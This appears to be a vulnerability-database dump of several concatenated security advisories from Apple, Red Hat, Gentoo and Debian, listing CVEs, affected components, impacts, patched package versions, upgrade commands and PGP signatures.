remote attacker may be able to unexpectedly alter application state Description: This issue was addressed with improved checks. CVE-2020-9941: Fabian Ising of FH Münster University of Applied Sciences and Damian Poddebniak of FH Münster University of Applied Sciences Messages Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local user may be able to discover a user’s deleted messages Description: The issue was addressed with improved deletion. CVE-2020-9988: William Breuer of the Netherlands CVE-2020-9989: von Brunn Media Model I/O Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-10011: Aleksandar Nikolic of Cisco Talos Entry added December 14, 2020 Model I/O Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-13524: Aleksandar Nikolic of Cisco Talos Model I/O Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution Description: A logic issue was addressed with improved state management. CVE-2020-10004: Aleksandar Nikolic of Cisco Talos NetworkExtension Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to elevate privileges Description: A use after free issue was addressed with improved memory management. CVE-2020-9996: Zhiwei Yuan of Trend Micro iCore Team, Junzhi Lu and Mickey Jin of Trend Micro NSRemoteView Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: A logic issue was addressed with improved restrictions. CVE-2020-27901: Thijs Alkemade of Computest Research Division Entry added December 14, 2020 NSRemoteView Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to preview files it does not have access to Description: An issue existed in the handling of snapshots. The issue was resolved with improved permissions logic. CVE-2020-27900: Thijs Alkemade of Computest Research Division PCRE Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Multiple issues in pcre Description: Multiple issues were addressed by updating to version 8.44. CVE-2019-20838 CVE-2020-14155 Power Management Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to determine kernel memory layout Description: A logic issue was addressed with improved state management. CVE-2020-10007: singi@theori working with Trend Micro Zero Day Initiative python Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Cookies belonging to one origin may be sent to another origin Description: Multiple issues were addressed with improved logic. CVE-2020-27896: an anonymous researcher Quick Look Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious app may be able to determine the existence of files on the computer Description: The issue was addressed with improved handling of icon caches. CVE-2020-9963: Csaba Fitzl (@theevilbit) of Offensive Security Quick Look Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted document may lead to a cross site scripting attack Description: An access issue was addressed with improved access restrictions. CVE-2020-10012: Heige of KnownSec 404 Team (https://www.knownsec.com/) and Bo Qu of Palo Alto Networks (https://www.paloaltonetworks.com/) Ruby Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to modify the file system Description: A path handling issue was addressed with improved validation. CVE-2020-27896: an anonymous researcher Ruby Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: When parsing certain JSON documents, the json gem can be coerced into creating arbitrary objects in the target system Description: This issue was addressed with improved checks. CVE-2020-10663: Jeremy Evans Safari Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Visiting a malicious website may lead to address bar spoofing Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. CVE-2020-9945: Narendra Bhati From Suma Soft Pvt. Ltd. Pune (India) @imnarendrabhati Safari Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to determine a user's open tabs in Safari Description: A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement. CVE-2020-9977: Josh Parnham (@joshparnham) Safari Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Visiting a malicious website may lead to address bar spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2020-9942: an anonymous researcher, Rahul d Kankrale (servicenger.com), Rayyan Bijoora (@Bijoora) of The City School, PAF Chapter, Ruilin Yang of Tencent Security Xuanwu Lab, YoKo Kho (@YoKoAcc) of PT Telekomunikasi Indonesia (Persero) Tbk, Zhiyang Zeng(@Wester) of OPPO ZIWU Security Lab Sandbox Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local user may be able to view senstive user information Description: An access issue was addressed with additional sandbox restrictions. CVE-2020-9969: Wojciech Reguła of SecuRing (wojciechregula.blog) SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause a denial of service Description: This issue was addressed with improved checks. CVE-2020-9991 SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to leak memory Description: An information disclosure issue was addressed with improved state management. CVE-2020-9849 SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Multiple issues in SQLite Description: Multiple issues were addressed by updating SQLite to version 3.32.3. CVE-2020-15358 SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A maliciously crafted SQL query may lead to data corruption Description: This issue was addressed with improved checks. CVE-2020-13631 SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause a denial of service Description: This issue was addressed with improved checks. CVE-2020-13434 CVE-2020-13435 CVE-2020-9991 SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2020-13630 Symptom Framework Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local attacker may be able to elevate their privileges Description: A use after free issue was addressed with improved memory management. CVE-2020-27899: 08Tc3wBB working with ZecOps Entry added December 14, 2020 System Preferences Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: A logic issue was addressed with improved state management. CVE-2020-10009: Thijs Alkemade of Computest Research Division TCC Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application with root privileges may be able to access private information Description: A logic issue was addressed with improved restrictions. CVE-2020-10008: Wojciech Reguła of SecuRing (wojciechregula.blog) Entry added December 14, 2020 WebKit Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2020-27918: Liu Long of Ant Security Light-Year Lab Entry updated December 14, 2020 Wi-Fi Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An attacker may be able to bypass Managed Frame Protection Description: A denial of service issue was addressed with improved state handling. CVE-2020-27898: Stephan Marais of University of Johannesburg Xsan Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to access restricted files Description: This issue was addressed with improved entitlements. CVE-2020-10006: Wojciech Reguła (@_r3ggi) of SecuRing Additional recognition 802.1X We would like to acknowledge Kenana Dalle of Hamad bin Khalifa University and Ryan Riley of Carnegie Mellon University in Qatar for their assistance. Entry added December 14, 2020 Audio We would like to acknowledge JunDong Xie and XingWei Lin of Ant- financial Light-Year Security Lab, an anonymous researcher for their assistance. Bluetooth We would like to acknowledge Andy Davis of NCC Group, Dennis Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for their assistance. Entry updated December 14, 2020 Clang We would like to acknowledge Brandon Azad of Google Project Zero for their assistance. Core Location We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for their assistance. Crash Reporter We would like to acknowledge Artur Byszko of AFINE for their assistance. Entry added December 14, 2020 Directory Utility We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing for their assistance. iAP We would like to acknowledge Andy Davis of NCC Group for their assistance. Kernel We would like to acknowledge Brandon Azad of Google Project Zero, Stephen Röttger of Google for their assistance. libxml2 We would like to acknowledge an anonymous researcher for their assistance. Entry added December 14, 2020 Login Window We would like to acknowledge Rob Morton of Leidos for their assistance. Photos Storage We would like to acknowledge Paulos Yibelo of LimeHats for their assistance. Quick Look We would like to acknowledge Csaba Fitzl (@theevilbit) and Wojciech Reguła of SecuRing (wojciechregula.blog) for their assistance. Safari We would like to acknowledge Gabriel Corona and Narendra Bhati From Suma Soft Pvt. Ltd. Pune (India) @imnarendrabhati for their assistance. Security We would like to acknowledge Christian Starkjohann of Objective Development Software GmbH for their assistance. System Preferences We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl/YDPwACgkQZcsbuWJ6 jjANmhAAoj+ZHNnH2pGDFl2/jrAtvWBtXg8mqw6NtNbGqWDZFhnY5q7Lp8WTx/Pi x64A4F8bU5xcybnmaDpK5PMwAAIiAg4g1BhpOq3pGyeHEasNx7D9damfqFGKiivS p8nl62XE74ayfxdZGa+2tOVFTFwqixfr0aALVoQUhAWNeYuvVSgJXlgdGjj+QSL+ 9vW86kbQypOqT5TPDg6tpJy3g5s4hotkfzCfxA9mIKOg5e/nnoRNhw0c1dzfeTRO INzGxnajKGGYy2C3MH6t0cKG0B6cH7aePZCHYJ1jmuAVd0SD3PfmoT76DeRGC4Ri c8fGD+5pvSF6/+5E+MbH3t3D6bLiCGRFJtYNMpr46gUKKt27EonSiheYCP9xR6lU ChpYdcgHMOHX4a07/Oo8vEwQrtJ4JryhI9tfBel1ewdSoxk2iCFKzLLYkDMihD6B 1x/9MlaqEpLYBnuKkrRzFINW23TzFPTI/+i2SbUscRQtK0qE7Up5C+IUkRvBGhEs MuEmEnn5spnVG2EBcKeLtJxtf/h5WaRFrev72EvSVR+Ko8Cj0MgK6IATu6saq8bV kURL5empvpexFAvVQWRDaLgGBHKM+uArBz2OP6t7wFvD2p1Vq5M+dMrEPna1JO/S AXZYC9Y9bBRZfYQAv7nxa+uIXy2rGTuQKQY8ldu4eEHtJ0OhaB8= =T5Y8 -----END PGP SIGNATURE----- . Security Fix(es): * golang: crypto/tls: certificate of wrong type is causing TLS client to panic (CVE-2021-34558) * golang: net: lookup functions may return invalid host names (CVE-2021-33195) * golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty (CVE-2021-33197) * golang: match/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents (CVE-2021-33198) * golang: encoding/xml: infinite loop when using xml.NewTokenDecoder with a custom TokenReader (CVE-2021-27918) * golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header (CVE-2021-31525) * golang: archive/zip: malformed archive may cause panic or memory exhaustion (CVE-2021-33196) It was found that the CVE-2021-27918, CVE-2021-31525 and CVE-2021-33196 have been incorrectly mentioned as fixed in RHSA for Serverless client kn 1.16.0. This has been fixed (CVE-2021-3703). Bugs fixed (https://bugzilla.redhat.com/): 1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic 1983651 - Release of OpenShift Serverless Serving 1.17.0 1983654 - Release of OpenShift Serverless Eventing 1.17.0 1989564 - CVE-2021-33195 golang: net: lookup functions may return invalid host names 1989570 - CVE-2021-33197 golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty 1989575 - CVE-2021-33198 golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents 1992955 - CVE-2021-3703 serverless: incomplete fix for CVE-2021-27918 / CVE-2021-31525 / CVE-2021-33196 5
var-202102-0421 A vulnerability was found in openvswitch. A limitation in the implementation of userspace packet parsing can allow a malicious user to send a specially crafted packet causing the resulting megaflow in the kernel to be too wide, potentially causing a denial of service. The highest threat from this vulnerability is to system availability. openvswitch Is vulnerable to a resource exhaustion.Denial of service (DoS) It may be put into a state. Bug Fix(es): * [RFE] Add auto load balance params (BZ#1920121) 4. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: openvswitch2.11 security update Advisory ID: RHSA-2021:1050-01 Product: Red Hat Virtualization Advisory URL: https://access.redhat.com/errata/RHSA-2021:1050 Issue date: 2021-03-31 CVE Names: CVE-2020-27827 CVE-2020-35498 ==================================================================== 1. Summary: An update for openvswitch2.11 is now available in Red Hat Virtualization. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Virtualization 4 Management Agent for RHEL 7 Hosts - ppc64le, x86_64 3. Description: Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Security Fix(es): * openvswitch: limitation in the OVS packet parsing in userspace leads to DoS (CVE-2020-35498) * lldp/openvswitch: denial of service via externally triggered memory leak (CVE-2020-27827) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/2974891 5. Package List: Red Hat Virtualization 4 Management Agent for RHEL 7 Hosts: Source: openvswitch2.11-2.11.3-86.el7fdp.src.rpm ovn2.11-2.11.1-57.el7fdp.src.rpm ppc64le: openvswitch2.11-2.11.3-86.el7fdp.ppc64le.rpm openvswitch2.11-debuginfo-2.11.3-86.el7fdp.ppc64le.rpm openvswitch2.11-devel-2.11.3-86.el7fdp.ppc64le.rpm ovn2.11-2.11.1-57.el7fdp.ppc64le.rpm ovn2.11-debuginfo-2.11.1-57.el7fdp.ppc64le.rpm ovn2.11-host-2.11.1-57.el7fdp.ppc64le.rpm ovn2.11-vtep-2.11.1-57.el7fdp.ppc64le.rpm python-openvswitch2.11-2.11.3-86.el7fdp.ppc64le.rpm x86_64: openvswitch2.11-2.11.3-86.el7fdp.x86_64.rpm openvswitch2.11-debuginfo-2.11.3-86.el7fdp.x86_64.rpm openvswitch2.11-devel-2.11.3-86.el7fdp.x86_64.rpm ovn2.11-2.11.1-57.el7fdp.x86_64.rpm ovn2.11-debuginfo-2.11.1-57.el7fdp.x86_64.rpm ovn2.11-host-2.11.1-57.el7fdp.x86_64.rpm ovn2.11-vtep-2.11.1-57.el7fdp.x86_64.rpm python-openvswitch2.11-2.11.3-86.el7fdp.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2020-27827 https://access.redhat.com/security/cve/CVE-2020-35498 https://access.redhat.com/security/updates/classification/#moderate 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYGRyQ9zjgjWX9erEAQhrShAAoeVmG1YdiiU+KFMdloJYVujUHAfasBEU Lh4XW/2T4R+kLbrG+cNu6Whm5JrNMNHxcr7VCBzBxMH2BdmhbBc+UhxEVIAmq9Kd BvOQykUW++052BkY4Iqm7q9viXkZNR4SK9fN2PKwK2yPezslta+AMQfnRhNzHU2a zv2uMt+198ALo/NriH4E5MFX4L8J7gvI+w1M6WsTXET9PJ3okANav+3E6gtwgheq gC0B3z7pzBDlSCIGXAi4lZjjtOd+jrZaxie6ltuQ0GPvEBLZXr+w8g9Q9SFhoBLE nN2UuWzhAq66rFPCan5YHn41AUNtwvfu5MAWOwk3KDFXznS9exXsBBQjN25y4jcO xl8cFSkJRghyJE1V5N2F52I9rTtqCysOyyLhoMWuNcYn7oU+rcQ/WAonrheYtZqk t+iRwOf04o9Zt9ns9Q5iHG5aQwXq0rB+HAeGfb0+4izqUF43HWj2pyxtaPq2jQfa iph0VN0x2M4ENXpjtO8vctu8Q1SKk0exiIou2d1EI0Dt4INZs67ewJyi1XoZP8Uu xRUWSPDMaWHKYCXzBkVD6nJQNmLT2usb4rfc3SkqG1Wjr2ieiiQC6k1Z/wi+RKfW lRK6WqHZTaAf0mG3QIjqmXa1IbF9CcGzoCtpfitPiWL0l2aewVSiDjXRsCVBorkX O5fT6yRvUC8=XI93 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202311-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: Open vSwitch: Multiple Vulnerabilities Date: November 26, 2023 Bugs: #765346, #769995, #803107, #887561 ID: 202311-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======= Multiple denial of service vulnerabilites have been found in Open vSwitch. Background ========= Open vSwitch is a production quality multilayer virtual switch. Affected packages ================ Package Vulnerable Unaffected -------------------- ------------ ------------ net-misc/openvswitch < 2.17.6 >= 2.17.6 Description ========== Multiple vulnerabilities have been discovered in Open vSwitch. Please review the CVE identifiers referenced below for details. Impact ===== Please review the referenced CVE identifiers for details. Workaround ========= There is no known workaround at this time. Resolution ========= All Open vSwitch users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openvswitch-2.17.6" References ========= [ 1 ] CVE-2020-27827 https://nvd.nist.gov/vuln/detail/CVE-2020-27827 [ 2 ] CVE-2020-35498 https://nvd.nist.gov/vuln/detail/CVE-2020-35498 [ 3 ] CVE-2021-3905 https://nvd.nist.gov/vuln/detail/CVE-2021-3905 [ 4 ] CVE-2021-36980 https://nvd.nist.gov/vuln/detail/CVE-2021-36980 [ 5 ] CVE-2022-4337 https://nvd.nist.gov/vuln/detail/CVE-2022-4337 [ 6 ] CVE-2022-4338 https://nvd.nist.gov/vuln/detail/CVE-2022-4338 [ 7 ] CVE-2023-1668 https://nvd.nist.gov/vuln/detail/CVE-2023-1668 Availability =========== This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/202311-16 Concerns? ======== Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ====== Copyright 2023 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5
var-200406-0158 Linux kernel 2.4.x and 2.6.x for x86 allows local users to cause a denial of service (system crash), possibly via an infinite loop that triggers a signal handler with a certain sequence of fsave and frstor instructions, as originally demonstrated using a "crash.c" program. The Linux kernel contains a denial-of-service vulnerability that allows local users to disable affected hosts. Linux Kernel Stores the process state of the floating point unit / Used to restore FSAVE/FRSTOR There are deficiencies in the handling of instructions. This issue is due to a design error that causes the kernel to fail to properly handle floating-point exceptions. This issue may be leveraged by an attacker to cause the affected system to crash, denying service to legitimate users. Although only select Linux kernels are reported to be affected, it is likely that various other versions are vulnerable as well. These issues were found during a recent audit of the Linux kernel source. The following drivers are reportedly affected by these issues: aironet asus_acpi decnet mpu401 msnd pss These issues may reportedly allow attackers to access kernel memory or gain escalated privileges on the affected computer. Local attackers can exploit these vulnerabilities to elevate privileges or conduct denial-of-service attacks on the system. The affected device drivers are: aironet, asus_acpi, decnet, mpu401, msnd, and pss. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1069-1 security@debian.org http://www.debian.org/security/ Martin Schulze, Dann Frazier May 20th, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : kernel-source-2.4.18,kernel-image-2.4.18-1-alpha,kernel-image-2.4.18-1-i386,kernel-image-2.4.18-hppa,kernel-image-2.4.18-powerpc-xfs,kernel-patch-2.4.18-powerpc,kernel-patch-benh Vulnerability : several Problem-Type : local/remote Debian-specific: no CVE IDs : CVE-2004-0427 CVE-2005-0489 CVE-2004-0394 CVE-2004-0447 CVE-2004-0554 CVE-2004-0565 CVE-2004-0685 CVE-2005-0001 CVE-2004-0883 CVE-2004-0949 CVE-2004-1016 CVE-2004-1333 CVE-2004-0997 CVE-2004-1335 CVE-2004-1017 CVE-2005-0124 CVE-2005-0528 CVE-2003-0984 CVE-2004-1070 CVE-2004-1071 CVE-2004-1072 CVE-2004-1073 CVE-2004-1074 CVE-2004-0138 CVE-2004-1068 CVE-2004-1234 CVE-2005-0003 CVE-2004-1235 CVE-2005-0504 CVE-2005-0384 CVE-2005-0135 Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code. CVE-2004-0394 A buffer overflow in the panic handling code has been found. CVE-2004-0565 An information leak in the context switch code has been found on the IA64 architecture. CVE-2004-0685 Unsafe use of copy_to_user in USB drivers may disclose sensitive information. CVE-2005-0001 A race condition in the i386 page fault handler may allow privilege escalation. CVE-2004-0883 Multiple vulnerabilities in the SMB filesystem code may allow denial of service of information disclosure. CVE-2004-0949 An information leak discovered in the SMB filesystem code. CVE-2004-0997 A local privilege escalation in the MIPS assembly code has been found. CVE-2004-1335 A memory leak in the ip_options_get() function may lead to denial of service. CVE-2004-1017 Multiple overflows exist in the io_edgeport driver which might be usable as a denial of service attack vector. CVE-2005-0124 Bryan Fulton reported a bounds checking bug in the coda_pioctl function which may allow local users to execute arbitrary code or trigger a denial of service attack. CVE-2005-0528 A local privilege escalation in the mremap function has been found CVE-2003-0984 Inproper initialization of the RTC may disclose information. CVE-2004-1070 Insufficient input sanitising in the load_elf_binary() function may lead to privilege escalation. CVE-2004-1071 Incorrect error handling in the binfmt_elf loader may lead to privilege escalation. CVE-2004-1072 A buffer overflow in the binfmt_elf loader may lead to privilege escalation or denial of service. CVE-2004-1073 The open_exec function may disclose information. CVE-2004-1074 The binfmt code is vulnerable to denial of service through malformed a.out binaries. CVE-2004-1068 A programming error in the unix_dgram_recvmsg() function may lead to privilege escalation. CVE-2004-1234 The ELF loader is vulnerable to denial of service through malformed binaries. CVE-2005-0003 Crafted ELF binaries may lead to privilege escalation, due to insufficient checking of overlapping memory regions. CVE-2004-1235 A race condition in the load_elf_library() and binfmt_aout() functions may allow privilege escalation. CVE-2005-0504 An integer overflow in the Moxa driver may lead to privilege escalation. The following matrix explains which kernel version for which architecture fix the problems mentioned above: Debian 3.0 (woody) Source 2.4.18-14.4 Alpha architecture 2.4.18-15woody1 Intel IA-32 architecture 2.4.18-13.2 HP Precision architecture 62.4 PowerPC architecture 2.4.18-1woody6 PowerPC architecture/XFS 20020329woody1 PowerPC architecture/benh 20020304woody1 Sun Sparc architecture 22woody1 We recommend that you upgrade your kernel package immediately and reboot the machine. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get dist-upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - -------------------------------- These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEb9YGXm3vHE4uyloRAkhXAJ0e1RmUxVZSbQICFa/j07oKPfWRVwCeMrhj wYGegwosZg6xi3oI77opLQY= =eu/T -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . Debian GNU/Linux 3.0 alias woody - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.dsc Size/MD5 checksum: 692 27f44a0eec5837b0b01d26c6cff392be http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.tar.gz Size/MD5 checksum: 27768 6c719a6343c9ea0dad44a736b3842504 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.dsc Size/MD5 checksum: 792 d7c89c90fad77944ca1c5a18327f31dd http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.tar.gz Size/MD5 checksum: 1013866 21b4b677a7a319442c8fe8a4c72eb4c2 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.dsc Size/MD5 checksum: 672 4c353db091e8edc4395e46cf8d39ec42 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.diff.gz Size/MD5 checksum: 71071 7012adde9ba9a573e1be66f0d258721a http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz Size/MD5 checksum: 32000211 237896fbb45ae652cc9c5cecc9b746da Architecture independent components: http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.18-sparc_22woody1_all.deb Size/MD5 checksum: 1521850 75d23c7c54094b1d25d3b708fd644407 http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.19-sparc_26woody1_all.deb Size/MD5 checksum: 1547874 c6881b25e3a5967e0f6f9c351fb88962 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5_all.deb Size/MD5 checksum: 1014564 0e89364c2816f5f4519256a8ea367ab6 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody3_all.deb Size/MD5 checksum: 1785490 c66cef9e87d9a89caeee02af31e3c96d 